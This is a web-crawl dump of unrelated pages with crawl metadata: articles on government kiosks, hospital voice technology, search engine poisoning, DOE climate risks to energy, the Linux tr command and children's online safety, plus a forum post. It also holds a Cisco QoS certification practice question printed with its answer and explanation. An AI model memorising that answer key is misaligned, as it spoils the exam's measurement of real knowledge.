kiosk control and applications," he said. "Also, the Web doesn't reach all citizens; in fact, it can be argued that those who need public services the most have the least access to high-tech service-delivery channels." Mendelsohn agreed with this view. "Generally, the very people who need public services the most -- the poor, the homeless, the disabled, the disadvantaged -- do not have access to a computer or to the Web." Although computers are available in libraries, the people Mendelsohn refers to are not likely to have the skills to use them. By contrast, kiosks providing touch-screen navigation require no computer skills, only the ability to push a few buttons and read the directions for using them. "A public-access kiosk," Rommel added, "is an easy way for some people to get the information they need, rather than trying to ferret it out wandering through the Web. One of the major attributes of this technology is that it presents only information necessary to meet the needs of the user." Depending on the number of units in a kiosk network, physical infrastructure and software are the major costs. In small networks of one to 10 units, system design and programming represent the highest costs. In systems of 100 or more units, hardware and maintenance are the big-ticket items. Either way, Rommel said that without a suitable application suite, expenses could outweigh benefits for a single agency. Public agencies have tried several solutions to mitigate the overall expense of kiosk projects, including spreading the cost over several agencies; partnering with private-sector companies that design, manufacture and operate Internet-enabled kiosk networks; charging local advertisers for program space; and charging user fees for transactional services, such as paying parking tickets, obtaining hunting licenses, renewing drivers' licenses and applying for license plates. Government entities may also partially offset costs by assigning a dollar value to staff hours saved as a result of automating information and selected transactions. Some vendors offer to install and maintain kiosk systems at no charge, in exchange for revenue-sharing agreements. In such arrangements, the contractor generally formats program changes received from the sponsoring agency, then downloads them via the Internet or intranet to designated kiosks. Mendelsohn said some state and local governments are wary of this type of arrangement. "They feel that if the project doesn't generate the revenue the vendor expects, what's to prevent them from pulling up their kiosks and leaving town?" he said. "In some cases, they've done that. So arrangements with vendors depend on the mindset of the state or local government." Lengthy procurement cycles, characteristic of government transactions, have also derailed projects. According to Rommel, it can take two or even three years to get a project deployed. "In the meantime, we, the manufacturers, may go through two or three generations of technology and deployment approaches," he said. "During that time, the internal champions for a project may migrate somewhere else. The result: inconsistency of vision and wavering support for the project." That happened with a U.S. Post Office kiosk project, he added. "They got caught in one of the long procurement cycles. It took them so long that by the time they were ready to deploy, the management supporting it rolled over, and a new crew came in with new agendas." It is interesting that the technology many thought would send kiosks to the boneyard actually made them more attractive to government. From Web technology came the intranet, private networks with the same protocols and hypertext links as the Web. Intranet-enabled kiosks around the country could now be programmed, controlled and monitored from central locations. No longer was it necessary to have technicians on the road, constantly tweaking and updating individual units. Web technology not only made the Internet-enabled kiosk a reality, it helped bring government services closer to those most in need of them. A few kiosks with transactional service capability also take credit cards, enabling users to pay parking tickets, renew drivers' licenses and buy hunting and fishing licenses. Government-sponsored kiosks may have tourist information and advertisements for hotels and restaurants. Some of these kiosks have telephones for making reservations. They may dispense discount coupons for special events or have a digital camera for taking pictures that can be sent via e-mail. Most public-sector kiosks also have printers. Mendelsohn stressed the importance of using printers specifically designed for kiosk applications -- durable systems with the ability to handle large paper rolls, and programming that limits printouts to only the information needed. "The public has no use for six pages of HTML headers. Store owners in shopping malls are furious when kiosks litter their area with paper." Mendelsohn said the three keys to kiosks are the same as the three rules of retail success: location, location, location. "Kiosks placed in city hall have not done well. People don't just stroll into city hall unless they have specific business there. But when kiosks are in shopping malls, grocery stores, and other places where the public just goes in the course of a regular day, they've been much more successful." Mendelsohn stressed simplicity -- uncluttered touch-screens and a simple front end with a few buttons and instructions for using them. Instead of being confronted by sophisticated Web browsers, kiosk users see a vastly simplified graphic user interface (GUI) that translates user commands to an unseen Web browser. "An intuitive GUI with four or five navigation buttons makes it easier for users to go to the next screen, go back or print," Mendelsohn said. "Considerable testing has shown that people want information on one screen; they are very unlikely to hit the 'next' button. "Smarter organizations will copy much of the information on their Web site to the kiosk. You don't have to reinvent the wheel, design all the applications a second time to run on the kiosk," he continued. "The information can be the same as what is on the Web site, only not nearly as much. Also, a fallback, a canned operation, is essential for those times when connection to the Internet fails. Better-designed units have remote monitoring capability and can automatically restart when the connection is down. If people see that a kiosk is out of service every time they walk past, it's doomed." Mendelsohn also stressed visual consistency; sites for each government department should have a similar appearance. "At least have the opening screen look the same. After the first page, if necessary, they can resume their individual appearance," he said. "But there has to be some commonality somewhere, otherwise, people get confused." A system of measuring public response has been incorporated in most successful kiosks. These programs typically record the number of hits the kiosk receives. They indicate which applications are used the most, which ones the least. They also indicate the time users remain with a particular application and the overall time spent at the kiosk. Kiosk programs operated by several states, major cities, and government departments suggest kiosks are, in fact, fulfilling a need for direct access to government services and information. This is especially true for kiosks that offer a wide range of transactional services. * Georgia: Working on its own, the Georgia Net Authority (GNA) took only six months to completely reengineer 110 kiosks inherited from the 1996 Olympics Project. Initially funded by the U.S. Department of Transportation, the statewide system was largely a flop, extremely slow, difficult to use and without central control. Someone had to be on the road full time to see if individual units were up or down, and to update programs and applications by popping in a new CD. GNA replaced the original Windows 95 operating system with Windows NT, increasing system speed by a factor of 1,000. It installed an intuitive interface designed for touch-screen kiosks, incorporated usage measurement software, and brought the system into a frame-relay network so it could be centrally controlled and monitored. "Our system is online 24 hours, 7 days a week," said GNA Executive Director Tom Bostick. "And from what we've been told, it is one of the largest statewide kiosk networks in the country." GNA kiosk applications include current weather for any Georgia city, weather-radar pictures, travel directions and information on restaurants, hotels, tourist attractions, and other points of interest. Users can look up airport information at the airport, including flight arrivals, departures and gate numbers. "The information is all live," Bostick said. "Users can even check out the traffic on the interstate highways around Atlanta." Bostick said the 1.5 million hits per month attract funding from the private sector. "We're using that data to generate revenue by marketing kiosk advertising. If a business already has a listing in the kiosk program, we point out that for a small annual fee, we can enhance their listing with a logo and a picture of their hotel, motel, inn or restaurant," he said. "We are also working with other major sponsors. The Atlanta Convention and Business Bureau wants us to put 20 kiosks in selected sites around the city, in exchange for an ongoing monthly fee." The GNA is presently considering the addition of a keyboard, a feature that will open up even more applications. * Ontario, Canada: Service Ontario is a highly successful kiosk network operated by the Canadian province in partnership with IBM. Started as a pilot program in 1993, it now has 61 units, mostly in shopping malls in Toronto and Ottawa. The popularity of the system is due mainly to the convenience it offers the pubic in being able to register motor vehicles, buy license plate stickers, get printouts of driving records and run history searches on used vehicles. Users can also pay fines for parking and moving violations, renew drivers', hunting and fishing licenses, and file change-of-address forms required by government agencies. "We run a user-satisfaction survey of two or three questions with each transaction performed," said Senior IBM Consultant Bill Clarke. "That's how we measure system performance in terms of customer satisfaction. So far, they're telling us we're on the right track." The combination of transaction-user fees and the internal value of the system make Service Ontario a self-supporting operation. According to Summit Research Associates' Mendelsohn, tens of thousands use this system every month. "When I'm asked, what is the most successful public-sector kiosk you've seen, my answer has been the same for four years -- Service Ontario." * New York City: A three-year pilot program showed New York City that enough of its citizens use kiosks to warrant serious rollout. According to Mendelsohn, the city is accepting bids for deployment of 1,000 units throughout all five boroughs. "Now, it's down to figuring the best business deal they can cut to get these units deployed." Mendelsohn said New York has scrutinized every aspect of kiosks, from public acceptance of their value to cost structure and long-term maintenance. "They see a tremendous value to their citizens in putting these things out -- people are using them." Once, during the pilot program, Mendelsohn was observing three kiosks in Brooklyn. "I was there for several hours, and there was a steady stream of people using them. The no-attention span of New Yorkers gave rise to the phrase, 'New York Minute,' but New Yorkers are using these things and finding them wonderful. They say, 'We have access to city services without the attitude.'" * Texas: Info Texas is a tenant model installed by North Communications, at no cost to the state. "Our key tenant is the Texas Workforce Commission (TWC)," Senior Vice President Rommel explained. "TWC pays North for the residency of their applications on the kiosks. We have about 80 units in this model in Texas." Under an agreement with the TWC, North Communications can market the kiosks to other public agencies and to the private sector, although the TWC has final approval over content. Originally, the agency was responsible for all the kiosks. Today it operates only 20, under an agreement with the Department of Human Services. The remaining units are under the control of local TWC boards, although public information appearing on units operated by the agency is also on all the rest. Programs are in English and Spanish. Users can look for job openings, register for work, fill out applications and get information on youth employment and unemployment insurance. With all that time saved, one might have expected staff layoffs, but that wasn't the case, said Mike Fernandez, director of the TWC's Technology and Facilities Management Division. "Staff that formerly spent much of their time and effort answering routine inquiries are now involved in job development and direct services. So the kiosk program has had measurable value for the government, although, it would be difficult to quantify the savings." Fernandez said Info Texas has been in place for about six years. "Based on feedback from the public, we view the kiosk as a very positive program." * HUD: The U.S. Department of Housing and Urban Development put out its first kiosks last May, initially in "high tower" federal buildings, but quickly yanked them out and installed them in shopping malls, supermarkets, public buildings and in their new street-level, storefront offices. "The intent," said Candi Harrison, Web manager for HUD's Internet home page, "is to get ourselves out to the people instead of making them come to us." The department has 26 "Next Door Kiosks" in cities nationwide, offering information on buying homes, finding affordable rentals, locating homeless shelters, and getting instructions on filing a housing discrimination complaint. Users can check to see if they are owed a refund on FHA mortgage loans. They can pull up a list of HUD-approved lenders, and find out what HUD properties are for sale in the area. The kiosks also have an interactive mortgage calculator; users can plug in basic information and find out whether they qualify for an FHA mortgage. The information is available in English or Spanish and is updated daily for the kiosk's area. Printouts are free. The cost of each unit is about $16,000. Harrison said people often ask her if the system is worth the cost. "Of course it is. If government can provide information of value to the people, then it's the right thing to do." According to a recent study by Frost & Sullivan of Mountain View, Calif., market revenues from world government kiosks reached $139.8 million in 1997, a growth of about 52 percent over the previous year. Since many public agencies also market kiosk advertising space to hotels, restaurants and special events, it should be noted that kiosk market revenues from tourism and entertainment totaled $52 million for the same year, an increase of 36 percent over 1996. Governments' continued efforts to streamline public service is one of the factors driving growth in the world government kiosk market. Technology is another. The incorporation of new magnetic card readers, pointing devices, microphones, cameras, proximity detectors, printers, keyboards, force-vector touch screens, flat screens and other developments will inevitably reduce the size and lower the cost of kiosk systems while improving reliability. As cost is reduced and kiosks continue to be recognized as an effective medium of providing information and government services, they may, in fact, become the vending machine of the Information Age. Bill McGarigle is a writer specializing in communications and information technology. He lives in Santa Cruz, Calif. Email
<urn:uuid:fe1fb0ad-eca0-4daa-b1ce-5e28270317a7>
CC-MAIN-2017-04
http://www.govtech.com/featured/Kiosks----Are-They-Worth-It.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00508-ip-10-171-10-70.ec2.internal.warc.gz
en
0.953909
3,598
2.9375
3
Joined: 05 May 2005 Posts: 98 Location: Navi Mumbai, India Analysis is finding the root cause of a problem. It can also be trying to understand the user requirements or finding out ways & means to achieve an objective. You can refer to the dictionary for its meaning. In software engineering, its a phase which occurs after planning & before design. Its basically done to understand the user requirements & condense them into specifications. Also it helps to attain clarity of objective. SDLC - Software Development Life Cycle. A process through which software is engineered or developed. For more details you can refer - Software Engineering (4th Ed.) - Roger Pressman.
<urn:uuid:f6a3e6a5-ea47-4389-a6d4-460d0c9edb52>
CC-MAIN-2017-04
http://ibmmainframes.com/about2781.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00564-ip-10-171-10-70.ec2.internal.warc.gz
en
0.962632
137
2.578125
3
Search Engine Poisoning: On The Rise Today, Imperva released a report on search engine poisoning. Search Engine Poisoning attacks manipulate, or “poison”, search engines to display search results that contain references to malware-delivering websites. There are a multitude of methods to perform SEP: taking control of popular websites; using the search engines’ “sponsored” links to reference malicious sites; and injecting HTML code. Here’s a graphic and a video explaining how it works: How has hacker interest in SEP grown? This is very difficult to gauge and formal statistics do not exist quantifying the problem. However, as the recent Bin Laden death reminds us, hackers leverage current events as they happen to dupe search engine users. The first description of the attack by researchers was in March 2008, by Dancho Danchev. One metric that helps understand the growth of this problem? Look at hacker forum discussions. For example, one major hacker forum saw a dramatic increase in discussions regarding search engine poisoning with XSS: Year over year growth of SEP discussions in hacker forums: Percent growth 2008 - 2009 212% 2009 - 2010 121% Year over year growth of SEP discussions in hacker forums: Raw numbers How does Imperva detect SEP? Our probes were able to detect and track a SEP attack campaign from start to end. The prevalence and longevity of this attack indicates not only how long it lasted undetected, but also that companies are not aware they are being used as a conduit of an attack. It also highlights that search engines should do more to improve their ability to accurately identify potentially harmful sites and warn users about them. The attack method we monitored returned search results containing references to sites infected with Cross Site Scripting (XSS). The infected Web pages then redirect unsuspecting users to malicious sites where their computers become infected with malware. This technique is particularly effective as the criminal doesn’t take over, or break into, any of the servers involved to carry out the attack. Instead he finds vulnerable sites, injects his code, and leaves it up to the search engine to spread his malware. The prevalence of this attack has ramifications for search engines, especially Google. Current solutions which warn the user of malicious sites lack accuracy and precision whereas many malicious sites continue to be returned un-flagged. However, these solutions can be enhanced by studying the footprints of a SEP via XSS. This allows a more accurate, and timely notification, as well as prudent indexing. We hope Google and Yahoo! step up. Authors & Topics:
<urn:uuid:b3f6e80b-a49d-419f-bccb-97cfad646b1d>
CC-MAIN-2017-04
http://blog.imperva.com/2011/06/search-engine-poisoning-on-the-rise.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284270.95/warc/CC-MAIN-20170116095124-00288-ip-10-171-10-70.ec2.internal.warc.gz
en
0.935108
533
2.59375
3
Foresight for a Smarter Planet Kathy MacWillliams 100000GQFD Visits (1890) This teaching module combines IBM Smarter Planet Initiative materials and website with basic foresight skills in such a way as to fit into a broad range of courses in business, engineering and the social sciences. The basic foresight skills involve understanding trends, a systems approach and the articulation of a preferred future. Combining these skills with IBM's extensive online library and interactive serious game provides the structure for a stand‐alone module, or with sufficient elaboration, could provide the framework for an entire course.
<urn:uuid:18cd6bb0-c99a-420e-a86a-d6bf99be1e06>
CC-MAIN-2017-04
https://www.ibm.com/developerworks/community/blogs/065eaf68-e1e1-409e-9826-75575a1a3d09/entry/foresight_for_a_smarter_planet_toward_the_city_sustainable?lang=en
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00436-ip-10-171-10-70.ec2.internal.warc.gz
en
0.883467
126
2.75
3
The operating room has four speakers in the ceiling for the computer's use, and a microphone for surgeon to communicate. White and IBM experimented with different microphones and adjusted the voice application to filter out common noises such as pumps and equipment beeps to prevent interference. At the start of operation, the doctor directs the computer to read vital data from the clinical database such as the patient's name, diagnosis and the procedure to be performed. This ensures everyone in the room is on the same page before the start of surgery. Once the surgeon says the word “incision,” the computer times the operation and notifies personnel when they need to perform such actions as giving the patient his next dose of anesthetic. This allows them to concentrate on the patient, rather than watching the clock, and reduces the likelihood of error. The doctor can also record data into the patient's file during the operation. For example, he can direct the camera to take a picture and record a description rather than having to remember later the specifics of the photo. “Pictures used to be stored without data because I couldn't enter it while operating,” said Dr. Burke. “Voice opens up an entirely new source of data occurring at the point of care when it is freshest and most accurate.” Paging Dr. Digital Adler of Gottlieb Memorial tried using pagers and cell phones to keep in touch with the staff, but found this unsatisfactory. Instead, the hospital now uses wireless communication badges from Vocera Communications. These two-ounce badges can be worn on a lanyard around the neck or clipped to clothing. The badges access the hospital's 802.11b wireless LAN to connect to the Vocera Server. The server sends messages to another badge over the WLAN, or links to the hospital's PBX to connect to phone lines. The hospital has 320 of the badges, shared by the 800 staff on three shifts. The badges have a built-in microphone and speaker, and the server uses voice recognition software to interact with the wearer. The user can access another person by name, nickname, external phone number, internal phone extension, job title or other description such as “the nurse covering Room 48B.” Since the user's location can also be tracked, someone can give a command like “connect me to the nearest security guard.” For privacy, users have the option of plugging a headset into the badge, but in most cases the users will go to a private area or transfer the call to a land line before discussing patient information. “One of our biggest concerns is with HIPAA (Health Insurance Portability and Accountability Act),” Adler explained. “We did a lot of training on not having conversations about sensitive patient information, and we don't take physician conversations in the patent rooms.” However, there are some advantages to having the patients hear conversations. For example, when the patient speaks Spanish, an interpreter can be reached through the badge and the conversation conducted immediately without an interpreter having to come to the patient's room. There are trade-offs, though. The badges have an LCD screen on the back for text messages and email, but that screen is too small to use with the telemonitoring system nurses use to see results from a patient's heart monitor. Thus certain nurses carry a separate device for that purpose. Adler said that Vocera is looking at a larger form factor that could also be used for telemonitoring. But she isn't sure if the hospital will change to the larger devices. “I don't know if we want to go to a dual use for these devices,” she said. “Right now the weight is perfect and the way in which you use it is so easy.”
<urn:uuid:0a94f505-1d47-4c3e-87af-785945581ec1>
CC-MAIN-2017-04
http://www.cioupdate.com/trends/article.php/11047_3640406_2/CIOs-Bringing-Hands-Free-Technology-to-Hospitals.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282202.61/warc/CC-MAIN-20170116095122-00068-ip-10-171-10-70.ec2.internal.warc.gz
en
0.94964
785
2.75
3
Describe QoS considerations Questions derived from the 642-845 – Optimizing Converged Cisco Networks Cisco Self-Test Software Practice Test. Objective: Describe QoS considerations SubObjective: Explain the necessity of QoS in converged networks (e.g., bandwidth, delay, loss, etc.) Item Number: 642-822.214.171.124 Multiple Answer, Multiple Choice Which delay types are categorized as fixed delay? (Choose two.) - Propagation delay - Queuing delay - Serialization delay A. Propagation delay C. Serialization delay Propagation and serialization delays are examples of fixed delay. Propagation delay is the amount of time it takes to transmit the bits of a frame across the physical wire. Propagation delay is typically ignored because it is limited by the speed of light. On the contrary, serialization delay is the amount of time it takes to place the bits of a packet, encapsulated into a frame, onto the physical media. Most fixed delays are due to propagation delays whereas variable delays are due to queuing delays. Queuing delay is the amount of time that a packet sits in a queue. Jitter describes delay variation. Delay variation, or jitter, occurs when the end-to-end delay is changing. Voice and Video traffic can handle some delay as long as the delay is a constant number. However, if the delay from point A to point B is constantly changing, the quality of voice and video traffic will be affected.
<urn:uuid:853ed546-21fb-4808-9e6f-f6358182dee4>
CC-MAIN-2017-04
http://certmag.com/describe-qos-considerations/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281419.3/warc/CC-MAIN-20170116095121-00004-ip-10-171-10-70.ec2.internal.warc.gz
en
0.907945
323
2.59375
3
The Nation's energy infrastructure isn't just at risk via online security rogues. The US Department of Energy today released a report that details the growing dangers from our ever-changing environment on the energy infrastructure that sounds every bit as threatening as some of the online threats. The "US Energy Sector Vulnerabilities to Climate Change and Extreme Weather" report observes that annual temperatures across the United States have increased by about 1.5°F over the last century. It notes that 2012 was both the warmest year on record in the contiguous United States and saw the hottest month since the country started keeping records in 1895. For the energy arena what all of this means, the DOE says, includes: - Increased risk of temporary partial or full shutdowns at thermoelectric (coal, natural gas, and nuclear) power plants because of decreased water availability for cooling and higher ambient and air water temperatures. Thermoelectric power plants require water cooling in order to operate. A study of coal plants, for example, found that roughly 60% of the current fleet is located in areas of water stress. - Reduced power generation from hydroelectric power plants in some regions and seasons due to drought and declining snowpack. - Risks to energy infrastructure located along the coast from sea level rise, increasing intensity of storms, and higher storm surge and flooding -- potentially disrupting oil and gas production, refining, and distribution, as well as electricity generation and distribution. - Increasing risks of physical damage to power lines, transformers and electricity distribution systems from hurricanes, storms and wildfires that are growing more intense and more frequent. - Increased risks of disruption and delay to fuel transport by rail and barge during more frequent periods of drought and flooding that affect water levels in rivers and ports. - Higher air conditioning costs and risks of blackouts and brownouts in some regions if the capacity of existing power plants does not keep pace with the growth in peak electricity demand due to increasing temperatures and heat waves. An Argonne National Laboratory study found that higher peak electricity demand as a result of climate change related temperature increases will require an additional 34 GW of new power generation capacity in the western United States alone by 2050, costing consumers $45 billion. This is roughly equivalent to more than 100 new power plants, and doesn't include new power plants that will be needed to accommodate growth in population or other factors, the DOE stated. "Potential future opportunities for federal, state, and local governments could include innovative policies that broaden the suite of available climate-resilient energy technologies and encourage their deployment, improved data collection and models to better inform researchers and lawmakers of energy sector vulnerabilities and response opportunities, and enhanced stakeholder engagement," the DOE stated. The report went onto detail some of the new technologies that could be - and in some cases are already being deployed to combat climate issues. Some of the ideas include: - Water efficient technologies for fuels production, including conventional oil and natural gas, shale gas, shale oil,and coalbed methane. - Improved energy efficiency and reduced water intensity of thermoelectric power generation, including innovative cooling technologies like non-traditional water supplies such as using municipal wastewater or brackish groundwater) - Increased use of drought tolerant crop varieties for bioenergy production and more water efficient conversion of biomass into biofuels - Increased resilience of energy infrastructure to wildfires, storms , floods, and sea level rise, including hardening of existing facilities and structures. - These activities will increase the resilience of our energy infrastructure by "hardening" existing facilities and structures to better withstand severe droughts, floods, storms or wildfires and by contributing to smarter development of new facilities. Check out these other hot stories:
<urn:uuid:fc6e9ada-acd7-40a8-b005-88372dc8ea89>
CC-MAIN-2017-04
http://www.networkworld.com/article/2224933/green-it/cyber-rogues-aren-t-the-only-threat-to-energy-supply--changing-environment-offers-plenty-of.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280319.10/warc/CC-MAIN-20170116095120-00124-ip-10-171-10-70.ec2.internal.warc.gz
en
0.942501
753
3
3
tr is one of the core commands in Linux/Unix, but very few seem to have a solid grasp of it. Its basic function is to translate string content given to it via STDIN from one thing to another. What makes this command unique is the fact that it doesn’t read from files; instead (as mentioned above), it takes input from STDIN. This may seem a bit strange at first, but it’s quite easy to get used to, as you’ll see in the examples below. tr works is it takes two “sets” of content from the user — think of the first as the original, and the second as the replacement. Perhaps the most basic illustration of this is simply changing one character to another: tr a b < originalfile > newfile This would very simply change, for the entire original file, all instances of the letter a into the letter b. A slightly more complex exercise would be changing all lowercase letters in the alphabet to uppercase: tr 'a-z' 'A-Z' < originalfile > newfile ** Notice that tr didn’t get passed the original file as an argument. Rather, it received originalfile’s content via STDIN. In this example, the first “set” was the lowercase a-z, and the second was the uppercase translation. That’s how it works: it takes input from somewhere and translates it using the first set to find what’ll be changed, and the second set to determine what it’ll be changed into. Here’s another example of tr using STDIN: echo "0123456789" | tr "0-9" "a-z" Here, we took text given to us from echo and handed it to tr via a pipe. So again, that’s how you get tr to process information — via STDIN — not through passing it a filename. Anyway, point made. One of the most powerful options that tr offers is the -d switch — which tells tr to delete something. Ever had a garbage character showing up all throughout a file that you wanted to get rid of in one fell swoop? Well, this is a very fast way to do it. One example would be deleting the carriage return characters from Windows formatted files to make them look correct in *Nix: tr -d '\r' < windowsfile > nixfile // delete the carriage returns One interesting option is the ability to “squeeze” a sequence of identical characters into a single instance of it. So, if you had a the string ‘xxx’, squeezing it would make it simply ‘x’. This command, for example, would remove multiple newlines from a file and leave you with just one at a time. tr -s '\n' < goodfile > betterfile tr also has the ability to sterilize files by using the -c switch in conjunction with the -d switch. What the -c switch does is take the complement of the supplied set. This is best shown with an example like the one below: tr -dc 'a-z A-Z \t \n '\32'' < input > output The complement means “the other part of”, or the part that completes what you’ve given. An easy way to think of it when used with the -d (delete) switch, is, “Delete everything except these characters. So in the line above we deleted everything except the upper and lowercase alphabet, newlines, and spaces (ASCII number 32). This is useful for using a “default deny” policy for cleaning a file, i.e. instead of deleting certain things from a file, you instead delete everything except a few characters that you explicitly allow. echo "all your base are tired of this meme" | tr 'a-z' 'n-za-m' p>nyy lbhe onfr ner gverq bs guvf zrzr There are a number of other options for the command, but this brief writeup covers the basics. Of course, if you’re ever in need of more detail, just consult the man page.:
<urn:uuid:768b6fd3-71ee-4c30-91c6-6d774f7f9aeb>
CC-MAIN-2017-04
https://danielmiessler.com/study/tr/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00518-ip-10-171-10-70.ec2.internal.warc.gz
en
0.908977
913
3.65625
4
The Power over Ethernet (PoE) lets Ethernet cables supply the power for network devices, at the same time as transmitting data in the normal way. Typical PoE users are businesses adding to their network or adding VoIP phones in buildings where new power lines would be expensive or inconvenient. So why not choose a PoE switch? PoE switches give you an easy way to add PoE devices to your network. The plug-and-play switches will automatically detect whether connected devices are PoE or PoE+ and send power accordingly. Choose managed PoE switches to control multiple devices from the data center. For simpler operations, choose more economical unmanaged PoE switches is enough. Now, let’s get close to PoE and PoE switches. What Is Power over Ethernet? Power over Ethernet is a technology that lets network cables carry electrical power. For example, a digital security camera normally requires two connections to be made when it is installed. One is a network connection, in order to be able to communicate with video recording and display equipment. Another is a power connection, to deliver the electrical power the camera needs to operate. However, if the camera is POE-enabled, only the network connection needs to be made, as it will receive its electrical power from this cable as well. Currently, there are two standards approved by the IEEE. The first, approved in 2003, is IEEE 802.3af and specifies up to 15.4 watts of direct current (DC) power. The second standard, ratified in 2009 as IEEE 802.3at, is commonly called high power PoE (HPoE) or PoE+ and doubles the power capabilities to 30 watts. Both standards have a maximum distance of 100 meters (328 feet) that is dictated by the distance limitation of Ethernet network cable. The 48VDC voltage used in plain old telephone service (POTS) analog circuits is what is commonly used for today’s PoE systems. Upgrade to PoE with a PoE Switch A basic PoE-based system usually consists of three main components: power-sourcing equipment (PSE), such as a PoE switch, category network cable and remote-powered devices, which may be an IP camera, IP access panel, IP intercom, VoIP or wireless access point (WAP). PSE is the most critical one among them, which is a device that injects power onto the same network cable that is being used for data. The injector can be a stand-alone single-port or multiport device, or the injector can be built into a network switch, which is called a PoE switch. The second option is more common today due to the convenience of using a single integrated device. PoE switch is not just handling data transmission, but also serving as the centralized power source for the video surveillance system. Therefore, upgrade your network to PoE is straightforward, and you just need to choose a PoE switch. How to Choose a PoE Switch? Although PoE is primarily designed as a plug-and-play technology, not all PoE switches are designed to deliver the full demands of maximum PoE on each port. PoE switches are sold at different price points and applications, from low-cost unmanaged edge switches with a few ports, up to complex multi-port rack-mounted units with sophisticated management. It’s easy to make a purchase decision based on the lowest price. However, the cheaper PoE switch will typically have a less robust power supply and may not provide the full power required by PoE endpoints. Therefore, selecting the right PoE switch for a job can be challenging. Following are some simple guidance that might help. Firstly, you should make sure how many ports you need to support your PoE devices. After finding a PoE switch that will provide suitable power conditions on a per-port basis, there is another element to consider—power budget. For example, you bought four cameras to use four cameras, not to use just one or two. Then will the switch you choose provide enough power per port for each camera? Will the switch provide suitable power to all ports at all times? Finally, after considering space in your panel, power demands of one device, power ability of a switch for one port, and powering ability of a switch across all ports, you are prepared to make a decision! The power consumption for PoE switches can add up quickly when there are multiple IP cameras, access control devices, outdoor heater/blowers, etc. The keys to choosing a right PoE switch is to make sure that the network switch can provide the necessary wattage of PoE that will be needed for each device, and that the aggregate wattage necessary to power all devices simultaneously is available. Fiberstore provides PoE switches in a variety of specifications, which may make your trip as comfortable as possible. For more information, please feel free to contact us at firstname.lastname@example.org.
<urn:uuid:f510e1a6-c7b2-43ba-a95b-ad2746fe8ab3>
CC-MAIN-2017-04
http://www.fs.com/blog/why-not-choose-a-poe-switch.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282937.55/warc/CC-MAIN-20170116095122-00179-ip-10-171-10-70.ec2.internal.warc.gz
en
0.929698
1,016
3.1875
3
When you consider all types of devices with online connectivity -- mobile phones, gaming consoles, tablets, laptops, PCs, smart TVs, e-readers, etc. -- there is a good chance you are online as much, if not more, than you are offline. If you are a parent of a young child, then you probably have purchased techy toys for either fun or for learning; as your child grows, then you must also decide at what age your child can go online, for how long, where, and for what purposes. Microsoft asked 1,000 adults, both parents and non-parents, "How old is too young for kids to go online unsupervised?" The answer: eight years old is the average age at which parents allow independent Internet and device use. Ninety-four percent of parents said they allow their kids unsupervised access to at least one device or online service like email or social networks. The poll found that most parents allow their kids access to gaming consoles and computers at age eight. However, when it comes to kids under the age of seven? - 41% of parents allow them to use a gaming console unsupervised. - 40% allow unsupervised access to a computer. - 29% of parents allow their kids under age 7 to use a mobile apps unsupervised. The poll also asked about teaching online safety to kids. Eighty-nine percent of people without kids and 74% of parents "agree that parents should provide online safety guidance." Are you flipping kidding me? If an eight-year-old child is online, unsupervised, without safety guidance, then that seems like a recipe for disaster. And kids installing mobile apps without supervision...does that mean they know all about checking out the permissions that apps ask for and what is and is not acceptable? Microsoft's survey found that the average age is between 11 and 12 for kids to start using mobile phones, texting and social networks, which could still potentially be disastrous without some kind of parental online safety guidance. For example, 14-year-old and 12-year-old girls were charged with aggravated stalking of a 12-year-old girl who committed suicide by jumping from the third floor of an abandoned cement plant tower. When the father of the 14-year-old girl was asked about his daughter's malicious harassing and cyberbullying, he told The Associated Press, "None of it's true. My daughter's a good girl and I'm 100% sure that whatever they're saying about my daughter is not true." Oh really? Maybe the dad should check out his daughter's bragging on Facebook. "'Yes, I bullied Rebecca and she killed herself but I don't give a ...' and you can add the last word yourself," quoted the sheriff from the girl's Facebook post. Does unsupervised device and social network usage, with or without online safety guidance, still seem wise? People without kids responded an average of two to three years later as acceptable for allowing device usage, meaning parents are less strict and "may be cooler than kids think." Some parents choose to use parental controls to limit their kids' Internet access, as seen in the "how old is too young to go online" debate on HardForum. Knowledge is power, and the Internet can teach kids all manner of topics, including teaching future hackers how to get around parental controls. Other parents reach out to other geeks for the answers, including help in choosing "a suitable mobile phone for a four-year-old." So how old is too young for kids to go online? Microsoft's Kim Sanchez, Director of Online Safety, wrote, "There is no magic age, but rather, parents should take into consideration the appropriateness for their individual family and responsibility or maturity level of their child." Although there may be no "correct" answer about what age you should allow your child to use different devices with or without supervision, you might be surprised as to whom parents and non-parents say is responsible for teaching kids about online safety. 51% of parents suggested that teaching online safety is the responsibility of teachers; 28% said it should be tech companies or relatives; 25% said such guidance should come from friends; and 22% of parents want to leave it to the government! Come on, folks, this isn't the sex talk, isn't taboo - it's online safety! Teaching kids about online "stranger danger," thinking before clicking links or opening email from someone they don't know, covering the web cam when not in use, thinking before sharing any idea that pops into their heads on social networks or in texts, thinking before accepting every new friend or follower, or thinking before sharing every picture they take is as important as teaching kids not to take candy or rides from strangers. Sure, there are great people online, but there are also cyberstalkers and those who are truly evil...they hope you don't teach your kids about being safe online. Like this? Here's more posts: - How Microsoft invented, or invisibly runs, almost everything - Most costly cybercrime attacks: Denial-of-service, malicious insider and web-based - Ctrl+Alt+Del 'was a mistake' admits Bill Gates, who said 'no' about returning as CEO - Report: NSA tracks and maps American citizens' social connections - Researchers develop attack framework for cracking Windows 8 picture passwords - Extreme tech for covert audio surveillance - Have you protected your privacy by opting out of cross-device ad tracking? - Microsoft finally patches gaping IE exploit with Patch Tuesday update - Not even Microsofties trust Microsoft’s approach to privacy - Wham bam thanks for giving up your Facebook and Google privacy, ma'am - Chris Hemsworth goes to 'nerd school' for hacking in cyber-terrorism thriller 'Cyber' - Are Bing it on challenge claims a bunch of bunk? Follow me on Twitter @PrivacyFanatic
